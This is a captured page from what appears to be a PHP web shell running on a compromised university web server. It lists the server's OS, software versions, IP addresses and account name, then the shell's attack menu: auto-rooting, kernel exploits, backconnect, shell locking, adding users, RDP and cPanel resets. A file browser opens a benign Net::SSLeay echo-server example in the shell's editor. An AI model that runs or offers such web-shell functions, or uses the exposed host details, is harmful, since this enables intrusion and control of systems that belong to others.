Linux web-conference.aiou.edu.pk 5.4.0-204-generic #224-Ubuntu SMP Thu Dec 5 13:38:28 UTC 2024 x86_64
Apache/2.4.41 (Ubuntu)
: 172.16.50.247 | : 18.191.132.7
Cant Read [ /etc/named.conf ]
7.4.3-4ubuntu2.28
appadmin
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
libnet-ssleay-perl /
examples /
[ HOME SHELL ]
Name
Size
Permission
Action
bio.pl
1.18
KB
-rw-r--r--
bulk.pl
1.91
KB
-rwxr-xr-x
callback.pl
3.12
KB
-rwxr-xr-x
cb-testi.pl
548
B
-rw-r--r--
cli-cert.pl
3.72
KB
-rw-r--r--
ephemeral.pl
553
B
-rw-r--r--
get_authenticated_page.pl
730
B
-rwxr-xr-x
get_page.pl
507
B
-rwxr-xr-x
get_page_cert.pl
966
B
-rw-r--r--
https-proxy-snif.pl
4.44
KB
-rwxr-xr-x
makecert.pl
1.5
KB
-rwxr-xr-x
minicli.pl
1.31
KB
-rwxr-xr-x
passwd-cb.pl
809
B
-rw-r--r--
req.conf
1.2
KB
-rw-r--r--
server_key.pem
963
B
-rw-r--r--
ssl-inetd-serv.pl
1.6
KB
-rwxr-xr-x
ssl_diff.pl
631
B
-rwxr-xr-x
sslcat.pl
526
B
-rwxr-xr-x
sslecho.pl
3.07
KB
-rwxr-xr-x
stdio_bulk.pl
2.53
KB
-rwxr-xr-x
tcpcat.pl
422
B
-rwxr-xr-x
tcpecho.pl
1.77
KB
-rwxr-xr-x
x509_cert_details.pl
9.88
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : sslecho.pl
#!/usr/bin/perl -w # sslecho.pl - Echo server using SSL # # Copyright (c) 1996,1998 Sampo Kellomaki <sampo@iki.fi>, All Rights Reserved. # Date: 27.6.1996, 8.6.1998 # 7.12.2001, added more support for client side certificate testing --Sampo # $Id: sslecho.pl,v 1.2 2001/12/08 17:43:14 sampo Exp $ # # Usage: ./sslecho.pl *port* *cert.pem* *key.pem* # # This server always binds to localhost as this is all that is needed # for tests. die "Usage: ./sslecho.pl *port* *cert.pem* *key.pem*\n" unless $#ARGV == 2; ($port, $cert_pem, $key_pem) = @ARGV; $our_ip = "\x7F\0\0\x01"; $trace = 2; use Socket; use Net::SSLeay qw(sslcat die_now die_if_ssl_error); $Net::SSLeay::trace = 3; # Super verbose debugging # # Create the socket and open a connection # $our_serv_params = pack ('S n a4 x8', &AF_INET, $port, $our_ip); socket (S, &AF_INET, &SOCK_STREAM, 0) or die "socket: $!"; bind (S, $our_serv_params) or die "bind: $! (port=$port)"; listen (S, 5) or die "listen: $!"; # # Prepare SSLeay # Net::SSLeay::load_error_strings(); Net::SSLeay::ERR_load_crypto_strings(); Net::SSLeay::SSLeay_add_ssl_algorithms(); Net::SSLeay::randomize(); print "sslecho: Creating SSL context...\n" if $trace>1; $ctx = Net::SSLeay::CTX_new () or die_now("CTX_new ($ctx): $!\n"); print "sslecho: Setting cert and RSA key...\n" if $trace>1; Net::SSLeay::CTX_set_cipher_list($ctx,'ALL'); Net::SSLeay::set_cert_and_key($ctx, $cert_pem, $key_pem) or die "key"; while (1) { print "sslecho $$: Accepting connections...\n" if $trace>1; ($addr = accept (NS, S)) or die "accept: $!"; $old_out = select (NS); $| = 1; select ($old_out); # Piping hot! if ($trace) { ($af,$client_port,$client_ip) = unpack('S n a4 x8',$addr); @inetaddr = unpack('C4',$client_ip); print "$af connection from " . join ('.', @inetaddr) . ":$client_port\n" if $trace;; } # # Do SSL negotiation stuff # print "sslecho: Creating SSL session (cxt=`$ctx')...\n" if $trace>1; $ssl = Net::SSLeay::new($ctx) or die_now("ssl new ($ssl): $!"); print "sslecho: Setting fd (ctx $ctx, con $ssl)...\n" if $trace>1; Net::SSLeay::set_fd($ssl, fileno(NS)); print "sslecho: Entering SSL negotiation phase...\n" if $trace>1; Net::SSLeay::accept($ssl); die_if_ssl_error("ssl_echo: ssl accept: ($!)"); print "sslecho: Cipher `" . Net::SSLeay::get_cipher($ssl) . "'\n" if $trace; # # Connected. Exchange some data. # $got = Net::SSLeay::ssl_read_all($ssl) or die "$$: ssl read failed"; print "sslecho $$: got " . length($got) . " bytes\n" if $trace==2; print "sslecho: Got `$got' (" . length ($got) . " chars)\n" if $trace>2; $got = uc $got; if ($got eq 'CLIENT-CERT-TEST') { $got .= Net::SSLeay::dump_peer_certificate($ssl) . "END CERT\n"; } Net::SSLeay::ssl_write_all($ssl, $got) or die "$$: ssl write failed"; $got = ''; # in case it was huge print "sslecho: Tearing down the connection.\n\n" if $trace>1; Net::SSLeay::free ($ssl); close NS; } Net::SSLeay::CTX_free ($ctx); close S; __END__
Close